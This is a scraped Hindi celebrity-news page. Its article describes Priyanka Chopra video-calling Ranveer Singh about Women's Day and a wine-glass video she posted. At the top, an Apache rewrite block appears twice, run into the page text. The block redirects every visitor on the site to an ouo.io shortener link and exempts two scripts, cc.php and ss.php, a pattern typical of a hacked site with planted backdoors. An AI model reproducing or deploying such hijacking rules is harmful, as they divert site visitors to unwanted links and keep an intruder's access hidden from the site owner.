
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 371
Previous Nextनई दिल्ली। प्रियंका चोपड़ा आज कल हॉलीवुड में बिजी हैं। हालांकि वो अभी भी अपने बॉलीवुड फ्रेंड्स के साथ खूब मस्ती करती रहती हैं। अब देखिए न हाल ही में प्रियंका ने आधी रात को अपने बेस्ट फ्रेंड रणवीर सिंह को वीडियो कॉल किया। वीडियो कॉल में प्रियंका, रणवीर से पूछती हैं कि तुमने इंटरनेशनल वुमन्स डे पर क्या स्पेशल किया? तो रणवीर ने कहा, 'मैंने वुमन्स डे पर ग्रीन कलर की स्कर्ट पहनी है। मैंने कल ही सेट पर सबको बोल दिया था कि वुमन्स डे पर सभी लोग स्कर्ट पहनेंगे, सभी लोग मतलब सभी फिर चाहे वो स्पॉट ब्वॉय ही क्यों न हो। तो सभी ने स्कर्ट पहनी।'
उसके बाद प्रियंका कहती हैं, हम लोगों ने तो तुम्हे स्कर्ट में पहले भी देखा है। फिल्म बाजीराव मस्तानी के समय तुमने स्कर्ट पहनी थी। इस पर रणवीर कहते हैं, हां, मैंने मेन वियर स्क्रट पहनी थी। रणवीर फिर आगे कहते हैं, तुम्हारी याद आदी है प्रियंका...जल्दी भारत आ जाओ। मैं तुमसे बात करके बहुत खुश हुआ। जिसके बाद प्रियंका कहती हैं, हां रन्नो मेरे पास एक प्लान भी है। कुछ दिनों पहले प्रियंका ने एक वीडियो शेयर किया था जिसे देखकर आप भी चौंक जाएंगे।
दरअसल, वीडियो में प्रियंका पहले ग्लास से वाइन पीती हैं और फिर उस ग्लास को सिर पर मार देती हैं। प्रियंका ने इस वीडियो को शेयर करते हुए कैप्शन में ऐसा करने की वजह भी बताई है। प्रियंका ने लिखा था, 'ऐसा तब होता है जब आप नाइन से वाइन तक काम करते हो। इसे घर पर करने की कोशिश न करें। खराब दिन गुजरने के बाद मैंने ये फैसला लिया। LOL ओके ओके मैं इसे नहीं करूंगी।'